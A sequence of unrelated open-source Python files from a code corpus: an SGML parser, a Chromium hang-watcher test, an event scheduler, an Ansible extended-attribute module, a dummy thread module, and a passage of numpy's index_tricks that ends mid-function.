"""A parser for SGML, using the derived class as a static DTD.""" # XXX This only supports those SGML features used by HTML. # XXX There should be a way to distinguish between PCDATA (parsed # character data -- the normal case), RCDATA (replaceable character # data -- only char and entity references and end tags are special) # and CDATA (character data -- only end tags are special). RCDATA is # not supported at all. import _markupbase import re __all__ = ["SGMLParser", "SGMLParseError"] # Regular expressions used for parsing interesting = re.compile('[&<]') incomplete = re.compile('&([a-zA-Z][a-zA-Z0-9]*|#[0-9]*)?|' '<([a-zA-Z][^<>]*|' '/([a-zA-Z][^<>]*)?|' '![^<>]*)?') entityref = re.compile('&([a-zA-Z][-.a-zA-Z0-9]*)[^a-zA-Z0-9]') charref = re.compile('&#([0-9]+)[^0-9]') starttagopen = re.compile('<[>a-zA-Z]') shorttagopen = re.compile('<[a-zA-Z][-.a-zA-Z0-9]*/') shorttag = re.compile('<([a-zA-Z][-.a-zA-Z0-9]*)/([^/]*)/') piclose = re.compile('>') endbracket = re.compile('[<>]') tagfind = re.compile('[a-zA-Z][-_.a-zA-Z0-9]*') attrfind = re.compile( r'\s*([a-zA-Z_][-:.a-zA-Z_0-9]*)(\s*=\s*' r'(\'[^\']*\'|"[^"]*"|[][\-a-zA-Z0-9./,:;+*%?!&$\(\)_#=~\'"@]*))?') class SGMLParseError(RuntimeError): """Exception raised for all parse errors.""" pass # SGML parser base class -- find tags and call handler functions. # Usage: p = SGMLParser(); p.feed(data); ...; p.close(). # The dtd is defined by deriving a class which defines methods # with special names to handle tags: start_foo and end_foo to handle # <foo> and </foo>, respectively, or do_foo to handle <foo> by itself. # (Tags are converted to lower case for this purpose.) The data # between tags is passed to the parser by calling self.handle_data() # with some data as argument (the data may be split up in arbitrary # chunks). Entity references are passed by calling # self.handle_entityref() with the entity reference as argument. 
class SGMLParser(_markupbase.ParserBase): # Definition of entities -- derived classes may override entity_or_charref = re.compile('&(?:' '([a-zA-Z][-.a-zA-Z0-9]*)|#([0-9]+)' ')(;?)') def __init__(self, verbose=0): """Initialize and reset this instance.""" self.verbose = verbose self.reset() def reset(self): """Reset this instance. Loses all unprocessed data.""" self.__starttag_text = None self.rawdata = '' self.stack = [] self.lasttag = '???' self.nomoretags = 0 self.literal = 0 _markupbase.ParserBase.reset(self) def setnomoretags(self): """Enter literal mode (CDATA) till EOF. Intended for derived classes only. """ self.nomoretags = self.literal = 1 def setliteral(self, *args): """Enter literal mode (CDATA). Intended for derived classes only. """ self.literal = 1 def feed(self, data): """Feed some data to the parser. Call this as often as you want, with as little or as much text as you want (may include '\n'). (This just saves the text, all the processing is done by goahead().) """ self.rawdata = self.rawdata + data self.goahead(0) def close(self): """Handle the remaining data.""" self.goahead(1) def error(self, message): raise SGMLParseError(message) # Internal -- handle data as far as reasonable. May leave state # and data to be processed by a subsequent call. If 'end' is # true, force handling all data as if followed by EOF marker. 
def goahead(self, end): rawdata = self.rawdata i = 0 n = len(rawdata) while i < n: if self.nomoretags: self.handle_data(rawdata[i:n]) i = n break match = interesting.search(rawdata, i) if match: j = match.start() else: j = n if i < j: self.handle_data(rawdata[i:j]) i = j if i == n: break if rawdata[i] == '<': if starttagopen.match(rawdata, i): if self.literal: self.handle_data(rawdata[i]) i = i+1 continue k = self.parse_starttag(i) if k < 0: break i = k continue if rawdata.startswith("</", i): k = self.parse_endtag(i) if k < 0: break i = k self.literal = 0 continue if self.literal: if n > (i + 1): self.handle_data("<") i = i+1 else: # incomplete break continue if rawdata.startswith("<!--", i): # Strictly speaking, a comment is --.*-- # within a declaration tag <!...>. # This should be removed, # and comments handled only in parse_declaration. k = self.parse_comment(i) if k < 0: break i = k continue if rawdata.startswith("<?", i): k = self.parse_pi(i) if k < 0: break i = i+k continue if rawdata.startswith("<!", i): # This is some sort of declaration; in "HTML as # deployed," this should only be the document type # declaration ("<!DOCTYPE html...>"). 
k = self.parse_declaration(i) if k < 0: break i = k continue elif rawdata[i] == '&': if self.literal: self.handle_data(rawdata[i]) i = i+1 continue match = charref.match(rawdata, i) if match: name = match.group(1) self.handle_charref(name) i = match.end(0) if rawdata[i-1] != ';': i = i-1 continue match = entityref.match(rawdata, i) if match: name = match.group(1) self.handle_entityref(name) i = match.end(0) if rawdata[i-1] != ';': i = i-1 continue else: self.error('neither < nor & ??') # We get here only if incomplete matches but # nothing else match = incomplete.match(rawdata, i) if not match: self.handle_data(rawdata[i]) i = i+1 continue j = match.end(0) if j == n: break # Really incomplete self.handle_data(rawdata[i:j]) i = j # end while if end and i < n: self.handle_data(rawdata[i:n]) i = n self.rawdata = rawdata[i:] # XXX if end: check for empty stack # Extensions for the DOCTYPE scanner: _decl_otherchars = '=' # Internal -- parse processing instr, return length or -1 if not terminated def parse_pi(self, i): rawdata = self.rawdata if rawdata[i:i+2] != '<?': self.error('unexpected call to parse_pi()') match = piclose.search(rawdata, i+2) if not match: return -1 j = match.start(0) self.handle_pi(rawdata[i+2: j]) j = match.end(0) return j-i def get_starttag_text(self): return self.__starttag_text # Internal -- handle starttag, return length or -1 if not terminated def parse_starttag(self, i): self.__starttag_text = None start_pos = i rawdata = self.rawdata if shorttagopen.match(rawdata, i): # SGML shorthand: <tag/data/ == <tag>data</tag> # XXX Can data contain &... (entity or char refs)? # XXX Can data contain < or > (tag characters)? # XXX Can there be whitespace before the first /? 
match = shorttag.match(rawdata, i) if not match: return -1 tag, data = match.group(1, 2) self.__starttag_text = '<%s/' % tag tag = tag.lower() k = match.end(0) self.finish_shorttag(tag, data) self.__starttag_text = rawdata[start_pos:match.end(1) + 1] return k # XXX The following should skip matching quotes (' or ") # As a shortcut way to exit, this isn't so bad, but shouldn't # be used to locate the actual end of the start tag since the # < or > characters may be embedded in an attribute value. match = endbracket.search(rawdata, i+1) if not match: return -1 j = match.start(0) # Now parse the data between i+1 and j into a tag and attrs attrs = [] if rawdata[i:i+2] == '<>': # SGML shorthand: <> == <last open tag seen> k = j tag = self.lasttag else: match = tagfind.match(rawdata, i+1) if not match: self.error('unexpected call to parse_starttag') k = match.end(0) tag = rawdata[i+1:k].lower() self.lasttag = tag while k < j: match = attrfind.match(rawdata, k) if not match: break attrname, rest, attrvalue = match.group(1, 2, 3) if not rest: attrvalue = attrname else: if (attrvalue[:1] == "'" == attrvalue[-1:] or attrvalue[:1] == '"' == attrvalue[-1:]): # strip quotes attrvalue = attrvalue[1:-1] attrvalue = self.entity_or_charref.sub( self._convert_ref, attrvalue) attrs.append((attrname.lower(), attrvalue)) k = match.end(0) if rawdata[j] == '>': j = j+1 self.__starttag_text = rawdata[start_pos:j] self.finish_starttag(tag, attrs) return j # Internal -- convert entity or character reference def _convert_ref(self, match): if match.group(2): return self.convert_charref(match.group(2)) or \ '&#%s%s' % match.groups()[1:] elif match.group(3): return self.convert_entityref(match.group(1)) or \ '&%s;' % match.group(1) else: return '&%s' % match.group(1) # Internal -- parse endtag def parse_endtag(self, i): rawdata = self.rawdata match = endbracket.search(rawdata, i+1) if not match: return -1 j = match.start(0) tag = rawdata[i+2:j].strip().lower() if rawdata[j] == '>': j = j+1 
self.finish_endtag(tag) return j # Internal -- finish parsing of <tag/data/ (same as <tag>data</tag>) def finish_shorttag(self, tag, data): self.finish_starttag(tag, []) self.handle_data(data) self.finish_endtag(tag) # Internal -- finish processing of start tag # Return -1 for unknown tag, 0 for open-only tag, 1 for balanced tag def finish_starttag(self, tag, attrs): try: method = getattr(self, 'start_' + tag) except AttributeError: try: method = getattr(self, 'do_' + tag) except AttributeError: self.unknown_starttag(tag, attrs) return -1 else: self.handle_starttag(tag, method, attrs) return 0 else: self.stack.append(tag) self.handle_starttag(tag, method, attrs) return 1 # Internal -- finish processing of end tag def finish_endtag(self, tag): if not tag: found = len(self.stack) - 1 if found < 0: self.unknown_endtag(tag) return else: if tag not in self.stack: try: method = getattr(self, 'end_' + tag) except AttributeError: self.unknown_endtag(tag) else: self.report_unbalanced(tag) return found = len(self.stack) for i in range(found): if self.stack[i] == tag: found = i while len(self.stack) > found: tag = self.stack[-1] try: method = getattr(self, 'end_' + tag) except AttributeError: method = None if method: self.handle_endtag(tag, method) else: self.unknown_endtag(tag) del self.stack[-1] # Overridable -- handle start tag def handle_starttag(self, tag, method, attrs): method(attrs) # Overridable -- handle end tag def handle_endtag(self, tag, method): method() # Example -- report an unbalanced </...> tag. 
def report_unbalanced(self, tag): if self.verbose: print('*** Unbalanced </' + tag + '>') print('*** Stack:', self.stack) def convert_charref(self, name): """Convert character reference, may be overridden.""" try: n = int(name) except ValueError: return if not 0 <= n <= 127: return return self.convert_codepoint(n) def convert_codepoint(self, codepoint): return chr(codepoint) def handle_charref(self, name): """Handle character reference, no need to override.""" replacement = self.convert_charref(name) if replacement is None: self.unknown_charref(name) else: self.handle_data(replacement) # Definition of entities -- derived classes may override entitydefs = \ {'lt': '<', 'gt': '>', 'amp': '&', 'quot': '"', 'apos': '\''} def convert_entityref(self, name): """Convert entity references. As an alternative to overriding this method; one can tailor the results by setting up the self.entitydefs mapping appropriately. """ table = self.entitydefs if name in table: return table[name] else: return def handle_entityref(self, name): """Handle entity references, no need to override.""" replacement = self.convert_entityref(name) if replacement is None: self.unknown_entityref(name) else: self.handle_data(replacement) # Example -- handle data, should be overridden def handle_data(self, data): pass # Example -- handle comment, could be overridden def handle_comment(self, data): pass # Example -- handle declaration, could be overridden def handle_decl(self, decl): pass # Example -- handle processing instruction, could be overridden def handle_pi(self, data): pass # To be overridden -- handlers for unknown objects def unknown_starttag(self, tag, attrs): pass def unknown_endtag(self, tag): pass def unknown_charref(self, ref): pass def unknown_entityref(self, ref): pass class TestSGMLParser(SGMLParser): def __init__(self, verbose=0): self.testdata = "" SGMLParser.__init__(self, verbose) def handle_data(self, data): self.testdata = self.testdata + data if len(repr(self.testdata)) >= 70: 
self.flush() def flush(self): data = self.testdata if data: self.testdata = "" print('data:', repr(data)) def handle_comment(self, data): self.flush() r = repr(data) if len(r) > 68: r = r[:32] + '...' + r[-32:] print('comment:', r) def unknown_starttag(self, tag, attrs): self.flush() if not attrs: print('start tag: <' + tag + '>') else: print('start tag: <' + tag) for name, value in attrs: print(name + '=' + '"' + value + '"') print('>') def unknown_endtag(self, tag): self.flush() print('end tag: </' + tag + '>') def unknown_entityref(self, ref): self.flush() print('*** unknown entity ref: &' + ref + ';') def unknown_charref(self, ref): self.flush() print('*** unknown char ref: &#' + ref + ';') def unknown_decl(self, data): self.flush() print('*** unknown decl: [' + data + ']') def close(self): SGMLParser.close(self) self.flush() def test(args = None): import sys if args is None: args = sys.argv[1:] if args and args[0] == '-s': args = args[1:] klass = SGMLParser else: klass = TestSGMLParser if args: file = args[0] else: file = 'test.html' if file == '-': f = sys.stdin else: try: f = open(file, 'r') except IOError as msg: print(file, ":", msg) sys.exit(1) data = f.read() if f is not sys.stdin: f.close() x = klass() for c in data: x.feed(c) x.close() if __name__ == '__main__': test()
gpl-3.0
danakj/chromium
chrome/test/kasko/hang_watcher_integration_test.py
9
1883
#!/usr/bin/env python # Copyright 2016 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """A Windows-only end-to-end integration test for the Chrome hang watcher. This test ensures that the hang watcher is able to detect when Chrome hangs and to generate a Kasko report. The report is then delivered to a locally hosted test crash server. If a crash report is received then all is well. Note that this test only works against non-component Release and Official builds of Chrome with Chrome branding, and attempting to use it with anything else will most likely lead to constant failures. Typical usage (assuming in root 'src' directory): - generate project files with the following build variables: GYP variables: branding=Chrome kasko_hang_reports=1 GN variables: target_cpu = "x86" is_debug = false is_chrome_branded = true enable_kasko_hang_reports = true - build the release Chrome binaries: ninja -C {build_dir} chrome.exe chromedriver.exe - run the test: python chrome/test/kasko/hang_watcher_integration_test.py --chrome={build_dir}\chrome.exe """ import logging import os import sys # Bring in the Kasko module. KASKO_DIR = os.path.join(os.path.dirname(__file__), 'py') sys.path.append(KASKO_DIR) import kasko _LOGGER = logging.getLogger(os.path.basename(__file__)) def Main(): options = kasko.config.ParseCommandLine() kasko.integration_test.RunTest( options, 'chrome://delayeduithreadhang', 120, { 'hung-process': 'DumpHungBrowserProcess()', 'hung-process-is-deadlock': 'GetThreadWaitChain()', 'hung-process-wait-chain-00': 'GetThreadWaitChain()', }) _LOGGER.info('Test passed successfully!') return 0 if __name__ == '__main__': sys.exit(Main())
bsd-3-clause
gameduell/duell
bin/mac/python2.7.9/lib/python2.7/sched.py
175
5088
"""A generally useful event scheduler class. Each instance of this class manages its own queue. No multi-threading is implied; you are supposed to hack that yourself, or use a single instance per application. Each instance is parametrized with two functions, one that is supposed to return the current time, one that is supposed to implement a delay. You can implement real-time scheduling by substituting time and sleep from built-in module time, or you can implement simulated time by writing your own functions. This can also be used to integrate scheduling with STDWIN events; the delay function is allowed to modify the queue. Time can be expressed as integers or floating point numbers, as long as it is consistent. Events are specified by tuples (time, priority, action, argument). As in UNIX, lower priority numbers mean higher priority; in this way the queue can be maintained as a priority queue. Execution of the event means calling the action function, passing it the argument sequence in "argument" (remember that in Python, multiple function arguments are be packed in a sequence). The action function may be an instance method so it has another way to reference private data (besides global variables). """ # XXX The timefunc and delayfunc should have been defined as methods # XXX so you can define new kinds of schedulers using subclassing # XXX instead of having to define a module or class just to hold # XXX the global state of your particular time and delay functions. import heapq from collections import namedtuple __all__ = ["scheduler"] Event = namedtuple('Event', 'time, priority, action, argument') class scheduler: def __init__(self, timefunc, delayfunc): """Initialize a new instance, passing the time and delay functions""" self._queue = [] self.timefunc = timefunc self.delayfunc = delayfunc def enterabs(self, time, priority, action, argument): """Enter a new event in the queue at an absolute time. 
Returns an ID for the event which can be used to remove it, if necessary. """ event = Event(time, priority, action, argument) heapq.heappush(self._queue, event) return event # The ID def enter(self, delay, priority, action, argument): """A variant that specifies the time as a relative time. This is actually the more commonly used interface. """ time = self.timefunc() + delay return self.enterabs(time, priority, action, argument) def cancel(self, event): """Remove an event from the queue. This must be presented the ID as returned by enter(). If the event is not in the queue, this raises ValueError. """ self._queue.remove(event) heapq.heapify(self._queue) def empty(self): """Check whether the queue is empty.""" return not self._queue def run(self): """Execute events until the queue is empty. When there is a positive delay until the first event, the delay function is called and the event is left in the queue; otherwise, the event is removed from the queue and executed (its action function is called, passing it the argument). If the delay function returns prematurely, it is simply restarted. It is legal for both the delay function and the action function to modify the queue or to raise an exception; exceptions are not caught but the scheduler's state remains well-defined so run() may be called again. A questionable hack is added to allow other threads to run: just after an event is executed, a delay of 0 is executed, to avoid monopolizing the CPU when other threads are also runnable. """ # localize variable access to minimize overhead # and to improve thread safety q = self._queue delayfunc = self.delayfunc timefunc = self.timefunc pop = heapq.heappop while q: time, priority, action, argument = checked_event = q[0] now = timefunc() if now < time: delayfunc(time - now) else: event = pop(q) # Verify that the event was not removed or altered # by another thread after we last looked at q[0]. 
if event is checked_event: action(*argument) delayfunc(0) # Let other threads run else: heapq.heappush(q, event) @property def queue(self): """An ordered list of upcoming events. Events are named tuples with fields for: time, priority, action, arguments """ # Use heapq to sort the queue rather than using 'sorted(self._queue)'. # With heapq, two events scheduled at the same time will show in # the actual order they would be retrieved. events = self._queue[:] return map(heapq.heappop, [events]*len(events))
bsd-2-clause
alexlo03/ansible
lib/ansible/modules/files/xattr.py
30
6842
#!/usr/bin/python # Copyright: (c) 2017, Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['stableinterface'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: xattr version_added: "1.3" short_description: Manage user defined extended attributes description: - Manages filesystem user defined extended attributes, requires that they are enabled on the target filesystem and that the setfattr/getfattr utilities are present. options: path: description: - The full path of the file/object to get the facts of. - Before 2.3 this option was only usable as I(name). aliases: [ name ] required: true namespace: description: - Namespace of the named name/key. default: user version_added: "2.7" key: description: - The name of a specific Extended attribute key to set/retrieve. value: description: - The value to set the named name/key to, it automatically sets the C(state) to 'set'. state: description: - defines which state you want to do. C(read) retrieves the current value for a C(key) (default) C(present) sets C(name) to C(value), default if value is set C(all) dumps all data C(keys) retrieves all keys C(absent) deletes the key choices: [ absent, all, keys, present, read ] default: read follow: description: - If C(yes), dereferences symlinks and sets/gets attributes on symlink target, otherwise acts on symlink itself. type: bool default: 'yes' notes: - As of Ansible 2.3, the I(name) option has been changed to I(path) as default, but I(name) still works as well. 
author: - Brian Coca (@bcoca) ''' EXAMPLES = ''' - name: Obtain the extended attributes of /etc/foo.conf xattr: path: /etc/foo.conf - name: Set the key 'user.foo' to value 'bar' xattr: path: /etc/foo.conf key: foo value: bar - name: Set the key 'trusted.glusterfs.volume-id' to value '0x817b94343f164f199e5b573b4ea1f914' xattr: path: /mnt/bricks/brick1 namespace: trusted key: glusterfs.volume-id value: "0x817b94343f164f199e5b573b4ea1f914" - name: Remove the key 'user.foo' xattr: path: /etc/foo.conf key: foo state: absent - name: Remove the key 'trusted.glusterfs.volume-id' xattr: path: /mnt/bricks/brick1 namespace: trusted key: glusterfs.volume-id state: absent ''' import os # import module snippets from ansible.module_utils.basic import AnsibleModule from ansible.module_utils._text import to_native def get_xattr_keys(module, path, follow): cmd = [module.get_bin_path('getfattr', True)] # prevents warning and not sure why it's not default cmd.append('--absolute-names') if not follow: cmd.append('-h') cmd.append(path) return _run_xattr(module, cmd) def get_xattr(module, path, key, follow): cmd = [module.get_bin_path('getfattr', True)] # prevents warning and not sure why it's not default cmd.append('--absolute-names') if not follow: cmd.append('-h') if key is None: cmd.append('-d') else: cmd.append('-n %s' % key) cmd.append(path) return _run_xattr(module, cmd, False) def set_xattr(module, path, key, value, follow): cmd = [module.get_bin_path('setfattr', True)] if not follow: cmd.append('-h') cmd.append('-n %s' % key) cmd.append('-v %s' % value) cmd.append(path) return _run_xattr(module, cmd) def rm_xattr(module, path, key, follow): cmd = [module.get_bin_path('setfattr', True)] if not follow: cmd.append('-h') cmd.append('-x %s' % key) cmd.append(path) return _run_xattr(module, cmd, False) def _run_xattr(module, cmd, check_rc=True): try: (rc, out, err) = module.run_command(' '.join(cmd), check_rc=check_rc) except Exception as e: module.fail_json(msg="%s!" 
% to_native(e)) # result = {'raw': out} result = {} for line in out.splitlines(): if line.startswith('#') or line == '': pass elif '=' in line: (key, val) = line.split('=') result[key] = val.strip('"') else: result[line] = '' return result def main(): module = AnsibleModule( argument_spec=dict( path=dict(type='path', required=True, aliases=['name']), namespace=dict(type='str', default='user'), key=dict(type='str'), value=dict(type='str'), state=dict(type='str', default='read', choices=['absent', 'all', 'keys', 'present', 'read']), follow=dict(type='bool', default=True), ), supports_check_mode=True, ) path = module.params.get('path') namespace = module.params.get('namespace') key = module.params.get('key') value = module.params.get('value') state = module.params.get('state') follow = module.params.get('follow') if not os.path.exists(path): module.fail_json(msg="path not found or not accessible!") changed = False msg = "" res = {} if key is None and state in ['absent', 'present']: module.fail_json(msg="%s needs a key parameter" % state) # Prepend the key with the namespace if defined if ( key is not None and namespace is not None and len(namespace) > 0 and not (namespace == 'user' and key.startswith('user.'))): key = '%s.%s' % (namespace, key) if (state == 'present' or value is not None): current = get_xattr(module, path, key, follow) if current is None or key not in current or value != current[key]: if not module.check_mode: res = set_xattr(module, path, key, value, follow) changed = True res = current msg = "%s set to %s" % (key, value) elif state == 'absent': current = get_xattr(module, path, key, follow) if current is not None and key in current: if not module.check_mode: res = rm_xattr(module, path, key, follow) changed = True res = current msg = "%s removed" % (key) elif state == 'keys': res = get_xattr_keys(module, path, follow) msg = "returning all keys" elif state == 'all': res = get_xattr(module, path, None, follow) msg = "dumping all" else: res = 
get_xattr(module, path, key, follow) msg = "returning %s" % key module.exit_json(changed=changed, msg=msg, xattr=res) if __name__ == '__main__': main()
gpl-3.0
40223250/2015cd_midterm2
static/Brython3.1.1-20150328-091302/Lib/_dummy_thread.py
742
4769
"""Drop-in replacement for the thread module. Meant to be used as a brain-dead substitute so that threaded code does not need to be rewritten for when the thread module is not present. Suggested usage is:: try: import _thread except ImportError: import _dummy_thread as _thread """ # Exports only things specified by thread documentation; # skipping obsolete synonyms allocate(), start_new(), exit_thread(). __all__ = ['error', 'start_new_thread', 'exit', 'get_ident', 'allocate_lock', 'interrupt_main', 'LockType'] # A dummy value TIMEOUT_MAX = 2**31 # NOTE: this module can be imported early in the extension building process, # and so top level imports of other modules should be avoided. Instead, all # imports are done when needed on a function-by-function basis. Since threads # are disabled, the import lock should not be an issue anyway (??). error = RuntimeError def start_new_thread(function, args, kwargs={}): """Dummy implementation of _thread.start_new_thread(). Compatibility is maintained by making sure that ``args`` is a tuple and ``kwargs`` is a dictionary. If an exception is raised and it is SystemExit (which can be done by _thread.exit()) it is caught and nothing is done; all other exceptions are printed out by using traceback.print_exc(). If the executed function calls interrupt_main the KeyboardInterrupt will be raised when the function returns. """ if type(args) != type(tuple()): raise TypeError("2nd arg must be a tuple") if type(kwargs) != type(dict()): raise TypeError("3rd arg must be a dict") global _main _main = False try: function(*args, **kwargs) except SystemExit: pass except: import traceback traceback.print_exc() _main = True global _interrupt if _interrupt: _interrupt = False raise KeyboardInterrupt def exit(): """Dummy implementation of _thread.exit().""" raise SystemExit def get_ident(): """Dummy implementation of _thread.get_ident(). 
Since this module should only be used when _threadmodule is not available, it is safe to assume that the current process is the only thread. Thus a constant can be safely returned. """ return -1 def allocate_lock(): """Dummy implementation of _thread.allocate_lock().""" return LockType() def stack_size(size=None): """Dummy implementation of _thread.stack_size().""" if size is not None: raise error("setting thread stack size not supported") return 0 class LockType(object): """Class implementing dummy implementation of _thread.LockType. Compatibility is maintained by maintaining self.locked_status which is a boolean that stores the state of the lock. Pickling of the lock, though, should not be done since if the _thread module is then used with an unpickled ``lock()`` from here problems could occur from this class not having atomic methods. """ def __init__(self): self.locked_status = False def acquire(self, waitflag=None, timeout=-1): """Dummy implementation of acquire(). For blocking calls, self.locked_status is automatically set to True and returned appropriately based on value of ``waitflag``. If it is non-blocking, then the value is actually checked and not set if it is already acquired. This is all done so that threading.Condition's assert statements aren't triggered and throw a little fit. """ if waitflag is None or waitflag: self.locked_status = True return True else: if not self.locked_status: self.locked_status = True return True else: if timeout > 0: import time time.sleep(timeout) return False __enter__ = acquire def __exit__(self, typ, val, tb): self.release() def release(self): """Release the dummy lock.""" # XXX Perhaps shouldn't actually bother to test? Could lead # to problems for complex, threaded code. 
if not self.locked_status: raise error self.locked_status = False return True def locked(self): return self.locked_status # Used to signal that interrupt_main was called in a "thread" _interrupt = False # True when not executing in a "thread" _main = True def interrupt_main(): """Set _interrupt flag to True to have start_new_thread raise KeyboardInterrupt upon exiting.""" if _main: raise KeyboardInterrupt else: global _interrupt _interrupt = True
agpl-3.0
381426068/MissionPlanner
Lib/site-packages/numpy/lib/index_tricks.py
53
26635
__all__ = ['unravel_index', 'mgrid', 'ogrid', 'r_', 'c_', 's_', 'index_exp', 'ix_', 'ndenumerate','ndindex', 'fill_diagonal','diag_indices','diag_indices_from'] import sys import numpy.core.numeric as _nx from numpy.core.numeric import ( asarray, ScalarType, array, alltrue, cumprod, arange ) from numpy.core.numerictypes import find_common_type import math import function_base import numpy.matrixlib as matrix from function_base import diff makemat = matrix.matrix # contributed by Stefan van der Walt def unravel_index(x,dims): """ Convert a flat index to an index tuple for an array of given shape. Parameters ---------- x : int Flattened index. dims : tuple of ints Input shape, the shape of an array into which indexing is required. Returns ------- idx : tuple of ints Tuple of the same shape as `dims`, containing the unraveled index. Notes ----- In the Examples section, since ``arr.flat[x] == arr.max()`` it may be easier to use flattened indexing than to re-map the index to a tuple. Examples -------- >>> arr = np.arange(20).reshape(5, 4) >>> arr array([[ 0, 1, 2, 3], [ 4, 5, 6, 7], [ 8, 9, 10, 11], [12, 13, 14, 15], [16, 17, 18, 19]]) >>> x = arr.argmax() >>> x 19 >>> dims = arr.shape >>> idx = np.unravel_index(x, dims) >>> idx (4, 3) >>> arr[idx] == arr.max() True """ if x > _nx.prod(dims)-1 or x < 0: raise ValueError("Invalid index, must be 0 <= x <= number of elements.") idx = _nx.empty_like(dims) # Take dimensions # [a,b,c,d] # Reverse and drop first element # [d,c,b] # Prepend [1] # [1,d,c,b] # Calculate cumulative product # [1,d,dc,dcb] # Reverse # [dcb,dc,d,1] dim_prod = _nx.cumprod([1] + list(dims)[:0:-1])[::-1] # Indices become [x/dcb % a, x/dc % b, x/d % c, x/1 % d] return tuple(x//dim_prod % dims) def ix_(*args): """ Construct an open mesh from multiple sequences. 
This function takes N 1-D sequences and returns N outputs with N dimensions each, such that the shape is 1 in all but one dimension and the dimension with the non-unit shape value cycles through all N dimensions. Using `ix_` one can quickly construct index arrays that will index the cross product. ``a[np.ix_([1,3],[2,5])]`` returns the array ``[[a[1,2] a[1,5]], [a[3,2] a[3,5]]]``. Parameters ---------- args : 1-D sequences Returns ------- out : tuple of ndarrays N arrays with N dimensions each, with N the number of input sequences. Together these arrays form an open mesh. See Also -------- ogrid, mgrid, meshgrid Examples -------- >>> a = np.arange(10).reshape(2, 5) >>> a array([[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]]) >>> ixgrid = np.ix_([0,1], [2,4]) >>> ixgrid (array([[0], [1]]), array([[2, 4]])) >>> ixgrid[0].shape, ixgrid[1].shape ((2, 1), (1, 2)) >>> a[ixgrid] array([[2, 4], [7, 9]]) """ out = [] nd = len(args) baseshape = [1]*nd for k in range(nd): new = _nx.asarray(args[k]) if (new.ndim != 1): raise ValueError, "Cross index must be 1 dimensional" if issubclass(new.dtype.type, _nx.bool_): new = new.nonzero()[0] baseshape[k] = len(new) new = new.reshape(tuple(baseshape)) out.append(new) baseshape[k] = 1 return tuple(out) class nd_grid(object): """ Construct a multi-dimensional "meshgrid". ``grid = nd_grid()`` creates an instance which will return a mesh-grid when indexed. The dimension and number of the output arrays are equal to the number of indexing dimensions. If the step length is not a complex number, then the stop is not inclusive. However, if the step length is a **complex number** (e.g. 5j), then the integer part of its magnitude is interpreted as specifying the number of points to create between the start and stop values, where the stop value **is inclusive**. If instantiated with an argument of ``sparse=True``, the mesh-grid is open (or not fleshed out) so that only one-dimension of each returned argument is greater than 1. 
Parameters ---------- sparse : bool, optional Whether the grid is sparse or not. Default is False. Notes ----- Two instances of `nd_grid` are made available in the NumPy namespace, `mgrid` and `ogrid`:: mgrid = nd_grid(sparse=False) ogrid = nd_grid(sparse=True) Users should use these pre-defined instances instead of using `nd_grid` directly. Examples -------- >>> mgrid = np.lib.index_tricks.nd_grid() >>> mgrid[0:5,0:5] array([[[0, 0, 0, 0, 0], [1, 1, 1, 1, 1], [2, 2, 2, 2, 2], [3, 3, 3, 3, 3], [4, 4, 4, 4, 4]], [[0, 1, 2, 3, 4], [0, 1, 2, 3, 4], [0, 1, 2, 3, 4], [0, 1, 2, 3, 4], [0, 1, 2, 3, 4]]]) >>> mgrid[-1:1:5j] array([-1. , -0.5, 0. , 0.5, 1. ]) >>> ogrid = np.lib.index_tricks.nd_grid(sparse=True) >>> ogrid[0:5,0:5] [array([[0], [1], [2], [3], [4]]), array([[0, 1, 2, 3, 4]])] """ def __init__(self, sparse=False): self.sparse = sparse def __getitem__(self,key): try: size = [] typ = int for k in range(len(key)): step = key[k].step start = key[k].start if start is None: start=0 if step is None: step=1 if isinstance(step, complex): size.append(int(abs(step))) typ = float else: size.append(math.ceil((key[k].stop - start)/(step*1.0))) if isinstance(step, float) or \ isinstance(start, float) or \ isinstance(key[k].stop, float): typ = float if self.sparse: nn = map(lambda x,t: _nx.arange(x, dtype=t), size, \ (typ,)*len(size)) else: nn = _nx.indices(size, typ) for k in range(len(size)): step = key[k].step start = key[k].start if start is None: start=0 if step is None: step=1 if isinstance(step, complex): step = int(abs(step)) if step != 1: step = (key[k].stop - start)/float(step-1) nn[k] = (nn[k]*step+start) if self.sparse: slobj = [_nx.newaxis]*len(size) for k in range(len(size)): slobj[k] = slice(None,None) nn[k] = nn[k][slobj] slobj[k] = _nx.newaxis return nn except (IndexError, TypeError): step = key.step stop = key.stop start = key.start if start is None: start = 0 if isinstance(step, complex): step = abs(step) length = int(step) if step != 1: step = 
(key.stop-start)/float(step-1) stop = key.stop+step return _nx.arange(0, length,1, float)*step + start else: return _nx.arange(start, stop, step) def __getslice__(self,i,j): return _nx.arange(i,j) def __len__(self): return 0 mgrid = nd_grid(sparse=False) ogrid = nd_grid(sparse=True) mgrid.__doc__ = None # set in numpy.add_newdocs ogrid.__doc__ = None # set in numpy.add_newdocs class AxisConcatenator(object): """ Translates slice objects to concatenation along an axis. For detailed documentation on usage, see `r_`. """ def _retval(self, res): if self.matrix: oldndim = res.ndim res = makemat(res) if oldndim == 1 and self.col: res = res.T self.axis = self._axis self.matrix = self._matrix self.col = 0 return res def __init__(self, axis=0, matrix=False, ndmin=1, trans1d=-1): self._axis = axis self._matrix = matrix self.axis = axis self.matrix = matrix self.col = 0 self.trans1d = trans1d self.ndmin = ndmin def __getitem__(self,key): trans1d = self.trans1d ndmin = self.ndmin if isinstance(key, str): frame = sys._getframe().f_back mymat = matrix.bmat(key,frame.f_globals,frame.f_locals) return mymat if type(key) is not tuple: key = (key,) objs = [] scalars = [] arraytypes = [] scalartypes = [] for k in range(len(key)): scalar = False if type(key[k]) is slice: step = key[k].step start = key[k].start stop = key[k].stop if start is None: start = 0 if step is None: step = 1 if isinstance(step, complex): size = int(abs(step)) newobj = function_base.linspace(start, stop, num=size) else: newobj = _nx.arange(start, stop, step) if ndmin > 1: newobj = array(newobj,copy=False,ndmin=ndmin) if trans1d != -1: newobj = newobj.swapaxes(-1,trans1d) elif isinstance(key[k],str): if k != 0: raise ValueError, "special directives must be the"\ "first entry." 
